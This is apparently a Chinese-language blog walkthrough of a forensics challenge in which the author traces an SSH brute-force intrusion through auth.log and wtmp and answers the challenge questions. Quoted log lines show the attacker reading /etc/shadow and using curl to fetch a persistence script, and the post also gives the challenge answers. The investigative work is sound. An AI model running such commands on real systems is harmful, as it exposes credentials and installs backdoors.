Sherlock Scenario

In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.

前置知识

auth.log

auth.log 是一个文本日志,记录成功和失败的登录、 sudo 和 su 尝试以及其他身份验证过程。存储在/var/log/auth.log 或者/var/log/secure
RFC 5424
每行格式:

<Timestamp> <Hostname> <Service>[<process_id>]: <Message>
形如:
Mar  6 06:18:01 ip-172-31-35-28 CRON[1119]: pam_unix(cron:session): session opened for user confluence(uid=998) by (uid=0)
日期为3月6日 06:18:01. 主机名是 ip-172-31-35-28. 该服务是cron服务,进程ID(pid)为 1119。root用户正在作为confluence 用户(uid为998)运行cron。

wtmp

wtmp是Linux系统中记录登录和注销事件的三个文件之一。
/var/run/utmp记录当前登录的用户。
/var/log/wtmp保存登录和注销活动的历史记录。
/var/log/btmp记录无效的登录尝试。
数据都以二进制格式存储,需要配合一些命令行使用,如 last,who等。
last => wtmp;
latb => btmp;

可以使用 命令utmpdump 打开文件

# 安装命令
sudo apt install util-linux

获取服务的类型,并按照数量进行排序

cut -d[ -f1 auth.log | cut -d' ' -f6 |sort | uniq -c | sort -nr
257 sshd
104 CRON
  8 systemd-logind

主要是 sshd 和 cron 服务。

SSH 登陆失败

root 用户登陆成功【正常登陆】的日志如下:(成功登陆的IP 地址203.101.190.9)

Mar 6 06:19:52 ip-172-31-35-28 sshd[1465]: AuthorizedKeysCommand /usr/share/ec2-instance-connect/eic_run_authorized_keys root SHA256:4vycLsDMzI+hyb9OP3wd18zIpyTqJmRq/QIZaLNrg8A failed, status 22 
Mar 6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2 
Mar 6 06:19:54 ip-172-31-35-28 sshd[1465]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)

然后就是登陆失败的日志,

Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Invalid user admin from 65.2.161.68 port 46380
Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Received disconnect from 65.2.161.68 port 46380:11: Bye Bye [preauth]
Mar  6 06:31:31 ip-172-31-35-28 sshd[2325]: Disconnected from invalid user admin 65.2.161.68 port 46380 [preauth]
Mar  6 06:31:31 ip-172-31-35-28 sshd[620]: error: beginning MaxStartups throttling

使用用户名为 admin登陆,但系统中不存在用户 admin
获取登陆失败的用户名

grep -i failed auth.log | awk -F'for ' '{print $2}' | awk -F'from' '{print $1}' | sort | uniq -c | sort -nr| sed '$d'
 12 invalid user server_adm
 11 invalid user svc_account
 10 invalid user admin
  9 backup
  6 root

合法用户 backup 和 root

SSH 登陆成功

└─🍀  cat auth.log | grep Accepted
Mar  6 06:19:54 ip-172-31-35-28 sshd[1465]: Accepted password for root from 203.101.190.9 port 42825 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:37:34 ip-172-31-35-28 sshd[2667]: Accepted password for cyberjunkie from 65.2.161.68 port 43260 ssh2

一共有四条成功,第一个是正常的登陆服务,第二个才是爆破成功的

Task 1

分析 auth.log 文件,识别攻击者用来进行暴力攻击的IP地址?

└─🍀 grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' auth.log | sort | uniq -c | sort -r
210 65.2.161.68
  4 65.2.161.68
  1 203.101.190.9
  1 172.31.35.28

大量来自 ip 65.2.161.68的连接

pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=65.2.161.68

结合 auth.log 可以得出该IP 在进行了暴力攻击。

Task 2

暴力破解成功,攻击者获得了服务器上一个账户的访问权限。这个账户的用户名是什么?

$ cat auth.log | grep Accepted -C 5
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.

因此成功暴力登陆的用户是root

Task3

您能否识别攻击者手动登录服务器以执行其目标的时间戳?
查看登陆日志,攻击者的 Ip地址 65.2.161.68

└─🍀 utmpdump wtmp  |grep root | grep '65.2.161.68'
Utmp dump of wtmp
[7] [02549] [ts/1] [root    ] [pts/1       ] [65.2.161.68         ] [65.2.161.68    ] [2024-03-06T06:32:45,387923+00:00]

时间为 2024-03-06 06:32:45
再配合 auth.log里的信息进行联合验证

$ cat auth.log | grep Accepted  -C 5
// 暴力破解成功
Mar  6 06:31:39 ip-172-31-35-28 sshd[2409]: Failed password for root from 65.2.161.68 port 46890 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
// 手动登陆成功
Mar  6 06:32:39 ip-172-31-35-28 sshd[620]: exited MaxStartups throttling after 00:01:08, 21 connections dropped
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.

时间为 2024-03-06 06:32:44
Q: 为什么auth.log 和 wtmp 之间的时间存在差异?
A: auth.log 在盒子上启动 SSH 连接并开始进行身份验证时进行记录。一旦身份验证成功,,它就会为用户启动一个终端进行交互式会话,这就是 wtmp 中记录的内容.

Task 4

SSH登录会话被跟踪,并在登录时分配一个会话号。问题2中分配给攻击者会话的用户帐户的会话号是多少?
37

// 暴力破解成功
Mar  6 06:31:39 ip-172-31-35-28 sshd[2409]: Failed password for root from 65.2.161.68 port 46890 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: Accepted password for root from 65.2.161.68 port 34782 ssh2
Mar  6 06:31:40 ip-172-31-35-28 sshd[2411]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:31:40 ip-172-31-35-28 systemd-logind[411]: New session 34 of user root.
// 手动登陆成功
Mar  6 06:32:39 ip-172-31-35-28 sshd[620]: exited MaxStartups throttling after 00:01:08, 21 connections dropped
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: Accepted password for root from 65.2.161.68 port 53184 ssh2
Mar  6 06:32:44 ip-172-31-35-28 sshd[2491]: pam_unix(sshd:session): session opened for user root(uid=0) by (uid=0)
Mar  6 06:32:44 ip-172-31-35-28 systemd-logind[411]: New session 37 of user root.

task 2成功登陆的用户是root,暴力登陆成功后分配的会话号是34 (==这里有点疑问,答案是37,应该指的是手动登陆root的会话号==)

Task 5

攻击者在服务器上添加了一个新用户作为其持久性策略的一部分,并为该新用户帐户授予了更高的权限。该帐户的名称是什么?

└─🍀 cat auth.log | grep add
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: group added to /etc/gshadow: name=cyberjunkie
Mar  6 06:34:18 ip-172-31-35-28 groupadd[2586]: new group: name=cyberjunkie, GID=1002
Mar  6 06:34:18 ip-172-31-35-28 useradd[2592]: new user: name=cyberjunkie, UID=1002, GID=1002, home=/home/cyberjunkie, shell=/bin/bash, from=/dev/pts/1
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to group 'sudo'
Mar  6 06:35:15 ip-172-31-35-28 usermod[2628]: add 'cyberjunkie' to shadow group 'sudo'

添加了一个用户和用户组,名字均为 cyberjunkie,并将该用户加入到了sudo 组中。

Task 6

用于持久性的 MITRE ATT&CK 子技术 ID 是什么?
创建帐户是一种在 Mitre Att&ck 矩阵上持久化的技术 Create Account
 T1136.001

Task 7

根据先前确认的身份验证时间和 auth.log 中的会话结束,攻击者的第一个 SSH 会话持续了多长时间? (秒)
从session 37开始往下,期间添加了一个用户,直到断开后,再次登陆新建的用户

Mar  6 06:37:24 ip-172-31-35-28 sshd[2491]: Received disconnect from 65.2.161.68 port 53184:11: disconnected by user
Mar  6 06:37:24 ip-172-31-35-28 sshd[2491]: Disconnected from user root 65.2.161.68 port 53184

开始时间为 06:32:45 ,结束时间为06:37:24,总计279 s

Task 8

攻击者登录他们的后门帐户并利用他们的更高权限下载脚本。使用 sudo 执行的完整命令是什么?
在登陆新建的用户后,先查看了 /etc/shadow的内容,然后开始下载东西
在linux中常用的下载命令有wget和curl

Mar  6 06:37:57 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/cat /etc/shadow
└─🍀 cat auth.log | grep -E '(wget|curl)'
Mar  6 06:39:38 ip-172-31-35-28 sudo: cyberjunkie : TTY=pts/1 ; PWD=/home/cyberjunkie ; USER=root ; COMMAND=/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh

Last modification:July 25, 2024
© Allow specification reprint
请我喝瓶冰阔落吧